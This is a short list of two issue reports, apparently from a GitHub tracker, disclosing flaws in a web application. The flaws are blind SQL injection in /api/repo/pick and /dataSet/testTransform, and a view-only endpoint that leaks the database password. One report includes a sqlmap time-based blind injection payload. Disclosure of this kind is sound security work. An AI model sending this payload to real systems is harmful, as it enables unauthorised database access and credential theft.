Results 2 issues of lcxing

There is a blind SQL injection in the API /api/repo/pick. It can be found using sqlmap. sqlmap identified the following injection point(s) with a total of 21258 HTTP(s) requests: --- Parameter: JSON...

The endpoint http://ip/dataSource/pageList has a permission problem: a user with only view permission can obtain the database password and thereby log in to the database directly.

![image](https://user-images.githubusercontent.com/14974791/202606461-845bc47d-fbbb-4409-b099-2b05259e40fe.png)

If a direct connection is not possible, the user can call POST /dataSet/testTransform to perform SQL injection; this endpoint has no permission restriction either. The payload is as follows:

```
Parameter: JSON #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: {"sourceCode":"001","dynSentence":"(SELECT 6513 FROM (SELECT(SLEEP(5)))geRa)","dataSetParamDtoList":[],"dataSetTransformDtoList":[],"setType":"sql"}
---
back-end DBMS:...
```